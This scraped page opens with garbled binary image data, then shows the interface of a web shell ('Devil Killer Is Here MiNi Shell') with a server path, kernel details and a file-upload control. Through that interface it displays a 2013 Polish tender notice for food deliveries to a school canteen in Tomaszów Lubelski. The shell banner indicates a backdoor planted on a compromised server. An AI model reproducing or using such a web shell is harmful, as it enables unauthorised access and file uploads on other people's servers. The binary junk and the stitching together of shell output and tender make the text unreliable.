JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130813/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130813/326856-N-2013.html

<p class="kh_header"><b>Tomaszów Lubelski: DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH DO STOŁOWKI SZKOLNEJ PRZY INTERNACIE ZESPOŁU SZKÓŁ NR 3 W TOMASZOWIE LUBELSKIM przy ul. Hallera 5</b><br>
<b>Numer ogłoszenia: 326856 - 2013; data zamieszczenia: 13.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół nr 3 im. Macieja Rataja , ul. Hallera 5, 22-600 Tomaszów Lubelski, woj. lubelskie, tel. 084 6650505, faks 084 6650505.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zsnr3.odt.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH DO STOŁOWKI SZKOLNEJ PRZY INTERNACIE ZESPOŁU SZKÓŁ NR 3 W TOMASZOWIE LUBELSKIM przy ul. Hallera 5.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia jest dostawa artykułów spożywczych do stołówki szkolnej przy internacie Zespołu Szkół nr 3 w Tomaszowie Lubelskim przy ul. Hallera 5.
Przedmiot zamówienia został podzielony na 14 CZĘŚCI od nr I do XIV .

Wspólny słownik kodów CPV: 15000000-8
CZĘŚĆ   I  	PIECZYWO					Kod CPV 15612500-6	
CZĘŚĆ  II 	MLEKO I JEGO PRZETWORY 			od CPV 15500000-3	
CZĘŚĆ  III 	MIĘSO JADALNE  I  wyroby wędliniarskie	Kod CPV 15100000-9,15131120-2
CZĘŚĆ  IV  	RÓŻNE PRODUKTY SPOZYWCZE		Kod CPV 15800000-6
CZĘŚĆ  V 	RYBY PRZETWORZONE I KONSERWOWANE	Kod CPV 15200000-0
CZĘŚĆ  VI 	DRÓB						Kod CPV 15112000- 6
CZĘŚĆ  VII 	MROŻONKI 			 		Kod CPV 15331100-8
CZĘŚĆ  VIII 	OWOCE  ŚWIEŻE				Kod CPV  03121000-5
CZĘŚĆ  IX 	WARZYWA 					Kod CPV 15300000-1 
CZĘŚĆ  X 	JAJA  KURZE					Kod CPV 03142500-3
CZĘŚĆ  XI 	PRODUKTY MĄCZNE  GOTOWE			Kod CPV 15851000-8
CZĘŚĆ  XII 	MAKARONY					Kod CPV 15850000-1
CZĘŚC  XIII    ZIEMNIAKI 					Kod CPV 03212100-1
CZĘŚĆ XIV  WARZYWA SEZONOWE 			Kod CPV 03221430-9

2/Szczegółowy opis każdej części zawierają Arkusze kalkulacyjne oferty jako wykazy asortymentowo - ilościowe na poszczególne części , które stanowią załączniki niniejszej Specyfikacji  Istotnych Warunków Zamówienia  od nr 2.1. do 2.14..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.61.25.00-6, 15.50.00.00-3, 15.10.00.00-9, 15.13.11.20-2, 15.80.00.00-6, 15.20.00.00-0, 15.11.20.00-6, 15.33.11.00-8, 03.12.10.00-5, 15.30.00.00-1, 03.14.25.00-3, 15.85.10.00-8, 15.85.00.00-1, 03.22.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 14.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna , że wykonawca spełnia warunek posiadania uprawnień do wykonywania działalności lub czynności , jeżeli wykonawca udokumentuje posiadanie zezwolenia na prowadzenie działalności (zezwolenie , koncesja ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie.
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt 6.1 SIWZ;;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału
w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt 6.1 SIWZ;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału
w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt 6.1 SIWZ;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny
spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału
w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt 6.1 SIWZ;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.zsnr3.odt.pl/index.php?option=com_content&view=category&id=21&Itemid=20<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespól Szkół Nr 3 w Tomaszowie Lubelskim , ul. Hallera 5 , 22-600 Tomaszów Lubelski.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.08.2013 godzina 12:00, miejsce: siedziba  Zamawiającego Zespoł Szkół Nr 3 w Tomaszowie Lubelskim, ul. Hallera 5, 22-600 Tomaszów Lubelski, sekretariat szkoły nr 40 / parter/.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PIECZYWO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Chleb  zwykły  krojony    waga nie mniej jak 500g 	szt.	9500
2	Chleb razowy mieszany waga nie mniej jak 500g	szt.	200
3	Bułka zwykła waga nie mniej jak  50 g	Szt.	15500
4	Bułka tarta 	kg	    150
5	Placek  cebularz 100 g	szt.	700
6	Drożdżówka 100 g	szt.	3300
8	Krokiet /pasztecik / waga nie mniej jak 120 g 	szt.	300
9	Pączek  waga nie mniej jak   60 g	szt.	700
10	Makowiec  500 g	szt.	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.60.00.00-4, 15.61.25.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> MLEKO I JEGO PRZETWORY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Mleko spożywcze  zaw.2%  tł. w opak. 1 l.	litr	4500
2	Śmietana zaw. 18 % tł.   	litr	450 
3	Śmietana Kubek  op.450 ml zaw.18%  tł.	szt.	 30
3	Masło ex .zawartość tł. 82,5%   op. 0.200 g 	kg 	150 
4	Twaróg półtłusty Kg.	 450 
5	Ser topiony  100 g	Szt.	2500 
7	Ser żółty półtłustyEDAMSKI 	kg	250
8	Jogurt  kubek  op. 150 ml. 	Szt.	2700 
10	Serek homogeniziwany  op. Nie mniej jak 200 g	szt	1000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3, 15.51.00.00-6, 15.55.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> MIĘSO JADALNE I WYROBY WĘDLINIARSKIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Mięso mielone wieprzowo-wołowe	kg.	550
2	Mięso  wieprzowe gulaszowe  II  kl.	kg.	600 
4	Karkówka wieprzowa b/k 	kg	220
5	Schab  wieprzowy z kością 	kg.	550
6	Schab wieprzowy b/k	kg	50
7	Wątroba wieprzowa	kg.	150 
8	Żeberka  wieprzowe(Paski) 	kg.	250 
9	Smalec wieprzowy 	kg	10
10	Boczek wędzony parzony	kg.	90 
11	Baleron 	kg.	40
12	Kiełbasa krakowska 	kg.	350
13	Mielonka  wieprzowa Smaczek 	kg.	150
14	Kiełbasa zwyczajna	kg.	80 
15	Kiełbasa łopatkowa	kg.	50 
16	Kiełbasa wiejska 	kg.	290
17	Kiełbasa szynkowa z kminkiem 	kg	250
18	Pieczeń chlebowa 	Kg 	230
19	Polędwica sopocka 	Kg 	220
20	Ogonówka 	kg	520
21	Paróweczki delikatesowe wieprzowe 	kg.	200
22	Szynka parzona 	kg	350
23	Kiełbasa golonkowa 	kg	50
24	Flaki krojone odgotowane  	kg	60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.11.00.00-2, 15.13.11.20-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> RÓŻNE PRODUKTY SPOŻYWCZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.		Cukier biały kryształ- paczkowany  op.1kg	1000	Kg
2.		Cukier puder op. 500 g	5	Szt.
3.		Chrzan  tarty w słoiku op.  Nie mniej jak  160 g	80	Szt
4.		Kakao ciemne holenderskie  sypkie  op. Nie mniej jak  100 g80Szt
5.		Dżem wiśniowy op.  nie mniej jak 280g	1350	Szt
6.		Dżem  truskawkowy , op. nie mniej jak  280 g	500	Szt
7.		Dżem  śliwkowy - nie mniej jak 280g	500	Szt
8.		Fasolka konserwowa czerwona op.nie mniejsze jak 400g 35	szt
9.		Fasolka konserwowa biała op. 400 g	30	Szt
10.		Groszek konserwowy  op. nie mniej jak  400 g  	120	Szt
11.		Gałka muszkatołowa mielona 20 g	10	Szt
12.		Herbata granulowana 100 g 	130	Szt
13.		Herbata  ekspresowa  op. zaw. 100 saszetek 	40	Op
14.		Kawa inka  op. nie mniejsze jak 150 g	65	Szt
15.		Keczup pikantny  op.  1000 g	50	Szt 
16.		Keczup PIKANTNY  op. nie mniej jak  500 g	250	Szt
17.		Koncentrat pomidorowy 30 % op. Nie mniej jak 200g250Szt
18.		Kukurydza konserwowa słodka  -op. nie mniejsze jak 400g	110Szt
19.		Kwasek cytrynowy  op. Nie mniej jak 20g	120	Szt
20.		Majonez  dekoracyjny nie mniej  jak 700 g  Firmy Winiary
lub inny równoważny	130	Szt
21.		Musztarda  delikatesowa  op. nie mniej 180g	190	Szt
22.		Majeranek  torebka  op. 20g	90	Szt
23.		Miód naturalny wielokwiatowy op. słoik  1300 kg	10	Szt
24.		Ocet  spirytusowy 10 %  op. 05 l. 	15	Szt
25.		Przyprawa do zup w płynie  op. - 1 l  Firmy Winiar lub inny  równoważny 	120	Szt
26.		Pieprz naturalny czarny mielony Op. nie mniej jak 20g 250	Szt
27.		Pieprz ziołowy torebka  op. 20 g	70	Szt
28.		Papryka w proszku słodka mielona Op. nie mniej jak 20 g 180Szt
29.		Pietruszka susz-  natka op nie mniej jak 20g 	150	Szt
30.		Koper susz nać  op. nie mniej jak 20 g110	Szt
31.		Przyprawa do potraw typu Vegeta lub inny równoważny op.200 g160Szt
32.		Ryż biały  op. 1 kg	150	Kg
33.		Rosołki drobiowe op. 180 g Firmy Winiar lub inny równoważny	130	Op
34.		Sól kuchenna  spożywcza 	160	Kg
35.		Ziele angielskie torebka 15g	25	Szt
36.		Liść laurowy  torebka 15 g	20	Szt
37.		Mąka ziemniaczana  op. 1000 g	25	Kg
38.		Mąka pszenna  luksusowa  typ 550  	350	Kg
39.		Olej jadalny rzepakowy  op. 1 litr	320	Szt
40.		Olej jadalny rzepakowy op. Nie mniej jak 3 l. 	50	szt
41.		Margaryna  śniadaniowa z zaw. Olejów roślinnych op. 500 g	1000	Szt
42.		Kasza jęczmienna  wiejska op.1000g	60	Kg
43.		Kasza gryczana  op. 1000 g	130	Kg
44.		Płatki kukurydziane  zwykłe op. Nie mniej jak 425 g	100	Szt.
45.		Ogórek konserwowy  poj. 0.9 l	250	Szt
46.		Papryka konserwowa poj. 0,9 l 	160	Szt
47.		Serek top. Krążki  op. 140 g	830	szt
48.		Serek top. plastry op. 150g	900	Szt
49.		Konserwa turystyczna  nie mniejjak  op. 135g	950	Szt
50.		Pasztet drobiowy nie mniej jak op.135g 	1500	Szt
51.		Delikat do mięs Knor lub równoważny  op. 700 g	15	Szt 
52.		Delikat do ryb op. 700g	3	Szt
53.		Delikat do drobiu op. 700 g	16	Szt

54.		Sos ogrodowy sałatkowy op.700 g	13	Szt
55.		Baton Snikers lub inny równoważny op. nie mniejsze jak 50 800Szt
56.		Ciastka delicje op. nie mniej jak 140 g	200	Op
57.		Ciastka  pierniczki luz 	20	Kg 
58.		Cukierki czekoladowe   Wedell luz lub inny równoważny 	50Kg
58	Czekolada   wedell  op. 100 g  lub  równoważny  	700	Szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.87.00.00-7, 15.33.22.90-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> RYBY PRZETWORZONE I KONSERWOWANE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Filet z ryby mrożony morszczuk SHP	Kg 	150
2	Filet śledziowy  b/skóry w oleju   	kg	60
3	Makrela wędzona na ciepło	Kg	100
4	Konserwa rybna szprot w oleju  op. nie mniej jak   170 g	Szt.	280
5	Konserwa rybna szprot w pomidorach op. nie mniej jak 170 g	Szt.	420
6	Paprykarz szczeciński op. 300 g	Szt.	500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0, 15.21.00.00-3, 15.24.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> DRÓB.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Filet drobiowy   świeży Kg	300 
2	Porcje rosołowe 	Kg	80
3	Mięso drobiowo - gulaszowe świeże 	Kg	180
4	Ćwiartka z kurczaka  świeża  	Kg	1100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.21.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> MROŻONKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Mieszanka mrożona wielowarzywna 7 składnikowa Op.2,5 kgOp	50 
2	Kalafior mrożony  Op. 2.50 kg	Op.	35 
3	Szpinak mrożony op. 2,5kg	op	30
4	Pyzy ziemniaczane mrożone op. Nie mniej jak 500g	 op	140.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> OWOCE ŚWIEŻE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Jabłka  gat. I 	kg	1500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.12.10.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> WARZYWA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Burak ćwikła 	kg.	350
2	Cebula  biała	kg.	300
3	marchew	kg.	650
4	seler  (korzeń ) 	kg.	30
5	por 	kg.	50
6	Pietruszka korzeń 	kg.	15
7	Kapusta czerwona	kg.	85
8	Kapusta biała 	kg.	750
9	Kapusta włoska 	kg.	170
10	Kapusta pekińska	kg.	200
11	Kapusta kiszona	kg.	160
12	Ogórek kwaszony 	kg.	220
13	Fasola biała 	kg.	80
14	Groch  łupany   	kg.	40
15	Czosnek 	kg.	25
16	Pieczarka 	kg.	60
17	Szczypior 	Peczk.	220.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.40-0, 15.33.11.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> JAJA KURZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	
Jaja kurze świeże kl. I Szt. 8500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> PRODUKTY MACZNE  GOTOWE.</p>
